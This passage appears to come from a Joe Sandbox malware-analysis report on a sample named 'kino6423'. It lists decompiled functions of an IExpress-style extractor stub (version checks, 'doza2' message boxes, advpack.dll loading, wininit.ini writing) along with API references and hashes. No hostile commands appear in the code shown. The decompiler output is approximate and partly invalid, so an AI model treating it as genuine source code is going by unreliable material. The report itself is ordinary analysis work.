				return E00E56CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x00e524e0
0x00e524eb
0x00e524f2
0x00e524f7
0x00e52504
0x00e5250e
0x00e5251d
0x00e5252c
0x00e52541
0x00e52546
0x00e52553
0x00e52555
0x00e52555
0x00e52546
0x00e5256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00E52506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00E5252C
_lopen.KERNEL32(?,00000040), ref: 00E5253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00E5254C
_lclose.KERNEL32(00000000), ref: 00E52555

Strings

wininit.ini, xrefs: 00E52510

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 976f38ae4994e8e186b937ed17754464c09cf8f119c91ee042cb6bf3ea60f542
Instruction ID: be145761d98252a3e66bf2eda6a76432e78794447be8859f61c1d20cdee1ab76
Opcode Fuzzy Hash: 976f38ae4994e8e186b937ed17754464c09cf8f119c91ee042cb6bf3ea60f542
Instruction Fuzzy Hash: 9B01B9327002186BC7209B669C0CEDF7B7CDB46752F440A65FA45F31D0DE744E49CA91

Uniqueness

Uniqueness Score: -1.00%

Function 00E536EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E536EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xe58004; // 0x5ba1a886
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xe58184 = 1;
						 *0xe58180 = 1;
						L13:
						 *0xe59a40 = _t119;
						L14:
						__eflags =  *0xe58a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00E52A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00E52A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xe58a38 & 0x00000001;
											if(( *0xe58a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00E5681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00E567C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00E528E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xe59a40 = _t119;
						 *0xe58184 = 1;
						 *0xe58180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xe59a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xe58184 = _t135;
							 *0xe58180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00E544B9(0, _t138);
					L66:
					return E00E56CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x00e536f9
0x00e53700
0x00e5370c
0x00e53716
0x00e53718
0x00e5371b
0x00e53721
0x00e5372b
0x00e5373d
0x00e53745
0x00e53746
0x00e53746
0x00e53749
0x00e537ab
0x00e537ad
0x00e537ae
0x00e537b3
0x00e537b8
0x00e537b8
0x00e537bf
0x00e537bf
0x00e537c5
0x00000000
0x00000000
0x00e537cb
0x00e537cd
0x00000000
0x00000000
0x00e537d5
0x00e537db
0x00e537e8
0x00e537ea
0x00e537ea
0x00e537ea
0x00e537f0
0x00e537f6
0x00e53805
0x00e53817
0x00e5382b
0x00e53830
0x00e53836
0x00e5383b
0x00e5383d
0x00e538eb
0x00e538eb
0x00e538f2
0x00e5390c
0x00e53911
0x00e53911
0x00e53913
0x00e5394d
0x00e5394d
0x00e5394f
0x00e538a9
0x00e538a9
0x00e538b0
0x00e538b2
0x00e538b9
0x00e538bb
0x00e538c1
0x00e53975
0x00e538c7
0x00e538de
0x00e538e0
0x00e538e0
0x00e5397b
0x00e5397d
0x00e539a9
0x00e5397f
0x00e53982
0x00e5398b
0x00e5398d
0x00e5398f
0x00e5399f
0x00e539a1
0x00e53991
0x00e53991
0x00e53991
0x00e5398f
0x00e539af
0x00e539b6
0x00e53a0f
0x00e53a0f
0x00e53a11
0x00e53a13
0x00e53a19
0x00000000
0x00e539b8
0x00e539b8
0x00e539ba
0x00000000
0x00000000
0x00e539bc
0x00e539bf
0x00000000
0x00000000
0x00e539c3
0x00e539c9
0x00e539ce
0x00e539d0
0x00e539e3
0x00e539e5
0x00e539e6
0x00e539f1
0x00e539f7
0x00e539fa
0x00e53a01
0x00e53a04
0x00000000
0x00000000
0x00e53a06
0x00e53a09
0x00e53a09
0x00e53a0b
0x00e53a0b
0x00000000
0x00e53a09
0x00e539fc
0x00000000
0x00e539fc
0x00e539d3
0x00e539d8
0x00e539da
0x00000000
0x00000000
0x00000000
0x00e539dc
0x00e539b6
0x00e53955
0x00e5395b
0x00000000
0x00000000
0x00e53961
0x00e53963
0x00000000
0x00000000
0x00e53969
0x00e53969
0x00000000
0x00e53969
0x00e53915
0x00e53915
0x00e5391b
0x00e5391f
0x00000000
0x00000000
0x00e5392d
0x00e53933
0x00e53938
0x00e5393a
0x00000000
0x00000000
0x00e53940
0x00e53946
0x00e5394b
0x00000000
0x00e5394b
0x00000000
0x00e538f2
0x00e53843
0x00e53845
0x00000000
0x00000000
0x00e5384b
0x00e5384d
0x00e53883
0x00e53885
0x00000000
0x00000000
0x00e5389a
0x00e5389e
0x00e5389e
0x00000000
0x00000000
0x00e538a0
0x00e538a0
0x00e538a2
0x00000000
0x00000000
0x00e538a4
0x00000000
0x00e538a4
0x00e5384f
0x00e53851
0x00e53857
0x00e5386e
0x00e53877
0x00e5387b
0x00000000
0x00000000
0x00000000
0x00e53881
0x00e53859
0x00e5385c
0x00e53862
0x00e53866
0x00000000
0x00000000
0x00e53868
0x00000000
0x00e538f4
0x00e538f4
0x00e538f5
0x00e538fb
0x00e53901
0x00e53901
0x00000000
0x00e5390a
0x00e5374b
0x00e5374e
0x00e5375c
0x00e53764
0x00e53769
0x00e5376e
0x00e53771
0x00e5379c
0x00e5379f
0x00000000
0x00000000
0x00e537a3
0x00e537a4
0x00000000
0x00e537a4
0x00e53773
0x00e53777
0x00e53778
0x00e5377f
0x00e53781
0x00e5378e
0x00e5378e
0x00e53794
0x00000000
0x00e53794
0x00e53783
0x00000000
0x00000000
0x00e53785
0x00e5378c
0x00000000
0x00000000
0x00000000
0x00e5378c
0x00e53750
0x00000000
0x00e5372d
0x00e5372d
0x00e5396b
0x00e5396b
0x00e5396c
0x00e5396e
0x00e5396f
0x00e53a1e
0x00e53a1e
0x00e53a22
0x00e53a27
0x00e53a3e
0x00e53a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00E53723
MessageBeep.USER32(00000000), ref: 00E539C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 00E539F1

Strings

3, xrefs: 00E53785
doza2, xrefs: 00E539E9, 00E53A19

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: 5067ca6c5474995a45e5f0516a1860c4c7b528d4a4b07f55d808008706aa0277
Instruction ID: 4915cd77f63c8aa5f2d53d2de1c7a16208354f2bdd9912a759723d0b45bcbab9
Opcode Fuzzy Hash: 5067ca6c5474995a45e5f0516a1860c4c7b528d4a4b07f55d808008706aa0277
Instruction Fuzzy Hash: 4C91F6B1E012149FDB398A35CD417EA77A1EB8538AF1518AADC49F7282D7708F88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E56517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E56517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xe59a3c; // 0xe50000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00E544B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0xe52ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x00e5651f
0x00e5652a
0x00e56534
0x00e5656b
0x00e56577
0x00e5657c
0x00e5657c
0x00e56536
0x00e5653e
0x00e56542
0x00000000
0x00e56544
0x00e56547
0x00e5654c
0x00e56549
0x00e56549
0x00e56549
0x00e5655e
0x00e56560
0x00e56569
0x00000000
0x00000000
0x00e56569
0x00e56542
0x00e56587

APIs

FindResourceA.KERNEL32(00E50000,000007D6,00000005), ref: 00E5652A
LoadResource.KERNEL32(00E50000,00000000,?,?,00E52EE8,00000000,00E519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E56538
DialogBoxIndirectParamA.USER32(00E50000,00000000,00000547,00E519E0,00000000), ref: 00E56557
FreeResource.KERNEL32(00000000,?,?,00E52EE8,00000000,00E519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E56560

Strings

., xrefs: 00E5657C

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .
API String ID: 1214682469-1603360339
Opcode ID: 77cecf1a37d50385c41efa7aa9c86a30b3ea28b3c8d62ad3ceb371b8d5ca5e2a
Instruction ID: 67bb8762ae98f3819fdb47822d049490adf68e4ee5a02395a968861cd5036e7e
Opcode Fuzzy Hash: 77cecf1a37d50385c41efa7aa9c86a30b3ea28b3c8d62ad3ceb371b8d5ca5e2a
Instruction Fuzzy Hash: 60012672140709BFDB105F6A9C08DBB7A6CEB85367F440E25FE10B3190E7718C1486A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E56495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E56495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xe58004; // 0x5ba1a886
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00E51781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				_t26 = "advpack.dll";
				E00E5658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00E56CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00e56495
0x00e56495
0x00e564a0
0x00e564a7
0x00e564ab
0x00e564bd
0x00e564c2
0x00e564d3
0x00e564df
0x00e564e8
0x00e56502
0x00e564ee
0x00e564f9
0x00e564f9
0x00e56516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00E564DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00E564F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00E56502

Strings

advpack.dll, xrefs: 00E564C2, 00E564CD, 00E56501
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E564AC

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
API String ID: 438848745-179718922
Opcode ID: 15f7e7e8c4347baef25144b5faee8d325836d592ca47fa8eff10fbe40fcd4952
Instruction ID: 9f32957ac51e3683d7cfc789ad34a97c568d3a52cafe4de8e827220b11b7a3fa
Opcode Fuzzy Hash: 15f7e7e8c4347baef25144b5faee8d325836d592ca47fa8eff10fbe40fcd4952
Instruction Fuzzy Hash: 7D012630640208AFDB54DB65DC45BEE7778DB50312F901EA5F885B30C0DF709E8D8A41

Uniqueness

Uniqueness Score: -1.00%

Function 00E54169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00E54169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00E5468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00E5468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00E544B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00E544B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x00e5417d
0x00e5418f
0x00e54193
0x00e541b7
0x00e541d3
0x00e541e6
0x00000000
0x00e541e7
0x00e541d5
0x00e541d6
0x00e541d8
0x00e541d9
0x00e541da
0x00e541df
0x00e541e1
0x00000000
0x00e541e1
0x00e541b9
0x00e541ba
0x00e541bc
0x00e541bd
0x00e541be
0x00000000
0x00e541be
0x00000000

APIs

Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
Part of subcall function 00E5468F: SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
Part of subcall function 00E5468F: LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
Part of subcall function 00E5468F: LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
Part of subcall function 00E5468F: memcpy_s.MSVCRT ref: 00E546E5
Part of subcall function 00E5468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00E530B4), ref: 00E54189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00E530B4), ref: 00E541E7

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Strings

<None>, xrefs: 00E541C5
FINISHMSG, xrefs: 00E54173, 00E541AB

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: a696157da32a9d02b6ba82ce93fe58589ab0713923fdf64caa45ecf7df146566
Instruction ID: b2f4584d2e504a0dccb6251d8d545711794331ac978f39af81eb5f55665bb6aa
Opcode Fuzzy Hash: a696157da32a9d02b6ba82ce93fe58589ab0713923fdf64caa45ecf7df146566
Instruction Fuzzy Hash: FE01FDE13016243FE32826264D86F7B25CEDBC478FF001829BF01F21C08AA8CC8840B5

Uniqueness

Uniqueness Score: -1.00%

Function 00E519E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E519E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xe58004; // 0x5ba1a886
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00E543D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xe59a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00E56CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00e519e0
0x00e519e0
0x00e519eb
0x00e519f2
0x00e519f9
0x00e519fc
0x00e51a01
0x00e51a2a
0x00e51a2e
0x00e51a3e
0x00e51a4f
0x00e51a62
0x00e51a6a
0x00000000
0x00e51a03
0x00e51a06
0x00e51a20
0x00e51a20
0x00e51a08
0x00e51a08
0x00e51a14
0x00000000
0x00e51a16
0x00e51a18
0x00e51a70
0x00e51a72
0x00e51a72
0x00e51a14
0x00e51a06
0x00e51a81

APIs

EndDialog.USER32(?,?), ref: 00E51A18
GetDesktopWindow.USER32 ref: 00E51A24
LoadStringA.USER32(?,?,00000200), ref: 00E51A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00E51A62
MessageBeep.USER32(000000FF), ref: 00E51A6A

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 0f2c9abe44d330d31a460c67fe756e4de54806e514eb33f6cc0cf712825a0ec4
Instruction ID: 41b12fab46dd6d839f52b61ba74b2bc6c3eea6869e29b670e499da7ec60afae0
Opcode Fuzzy Hash: 0f2c9abe44d330d31a460c67fe756e4de54806e514eb33f6cc0cf712825a0ec4
Instruction Fuzzy Hash: 6511C8715012199FDB15EF64DE08BAE77B8EF49302F104AA4F922F7191DE309E09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00E57155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E57155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xe58004; // 0x5ba1a886
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xe58004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xe58004 = _t39;
				}
				_t37 =  !_t36;
				 *0xe58008 = _t37;
				return _t37;
			}

0x00e5715d
0x00e57161
0x00e57165
0x00e57178
0x00e57182
0x00e5718e
0x00e57197
0x00e571a0
0x00e571b1
0x00e571b8
0x00e571c4
0x00e571c7
0x00e571cb
0x00e571d5
0x00e571da
0x00e571da
0x00e571dc
0x00e571dc
0x00e571e2
0x00e571e5
0x00e571ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E57182
GetCurrentProcessId.KERNEL32 ref: 00E57191
GetCurrentThreadId.KERNEL32 ref: 00E5719A
GetTickCount.KERNEL32 ref: 00E571A3
QueryPerformanceCounter.KERNEL32(?), ref: 00E571B8

Memory Dump Source

